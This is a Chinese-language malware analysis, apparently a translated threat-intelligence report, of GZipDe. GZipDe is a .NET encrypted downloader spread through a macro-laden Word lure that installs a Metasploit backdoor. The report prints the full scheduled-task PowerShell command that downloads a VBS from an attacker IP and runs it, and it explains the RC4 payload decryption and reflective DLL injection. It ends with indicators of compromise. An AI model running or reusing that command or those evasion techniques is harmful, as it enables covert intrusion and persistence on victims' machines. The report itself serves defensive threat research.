GZipDe恶意软件分析

导语:GZipDe是一款新的恶意软件,可以作为加密下载器,还可以释放Metasploit后门。

今年5月底,Middle Eastern新闻网发布了一篇关于下一届上合峰会的文章。1周后,AlienVault实验室就检测到了攻击该区域的恶意文档,恶意文档使用了一部分原文内容作为诱饵,如下图所示:

image.png

GZipDe恶意文档示例

这是多阶段感染的第一步。虽然最终的目的看起来是安装一个Metasploit后门,但研究人员发现了一个.NET下载器,该下载器使用传统的加密方法来混淆进程内存并避免反病毒软件的检测。

恶意文档

该文件被一个Afghanistan的用户上传到VirusTotal,该文件含有宏的恶意软件嵌入到微软word文档中。一旦文档打开,就会执行一个VB脚本,并在隐藏的Powershell控制台中执行新的任务:

image.png

'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F

利用HTTP请求,可以解析下面的URL:

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

因为服务器已经下线了,所以没能看到感染链的下一步。

基于传统路径的分析,研究人员认为该文件与后面的感染步骤相关:

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.

GZipDe:加密下载器

恶意软件的内部名叫做Gzipde,这在攻击者机器中的路径中可以看到:

\Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb

虽然攻击者在本版本中加入了额外的加密payload层,但研究人员还是发现了原始的逆向TCP payload是公布在Github上的。该payload中含有一个Base64的字符串GZipDe,使用zip压缩和对称加密算法加密来绕过反病毒软件检测。

GZipDe密钥是一个数组,如下所示:

image.png

GZipDe密钥

解压后,payload就会被传递给解密器。解密方法是23字节密钥长度的RC4方法。

image.png

GZipDe解密器

恶意软件会分配新的有读、写、执行权限的内存页。然后把解密的payload的内容复制并加载到新的线程,并执行。

脚本使用WaitForSingleObject C#类,也就是说程序访问了一个mutex对象。一个特殊的handler控制着进程对系统资源的访问。这可以防止恶意软件的多个实例同时运行,增加系统资源利用率并产生更多的网络噪声。

image.png

GZipDe脚本判断mutex对象

Payload中含有联系服务器175.194.42[.]8的shellcode。当服务器下线时,Shodan记录到它服务一个Metasploit payload:

image.png

Metasploit已经变成目标攻击的一个流行的选择。

image.png

Metasploit payload

服务器175.194.42[.]8会分发一个Metasploit payload,含有绕过系统检测到shellocde和Meterpreter payload(实际上是一个后门)。比如,可以从系统收集信息,联系C2服务器来接收命令。

Shellcode会加载整个DLL到内存中,所以可以在不向硬盘写入信息的情况下运作,这也叫做Reflective DLL injection(反射型DLL注入)。从这点看,攻击者可以传输任意的payload来获取权限提升。

附录

文件哈希:

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28

https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c

https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711

IP地址:

118.193.251[.]137

175.194.42[.]8

URLs:

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

源链接

Hacking more

...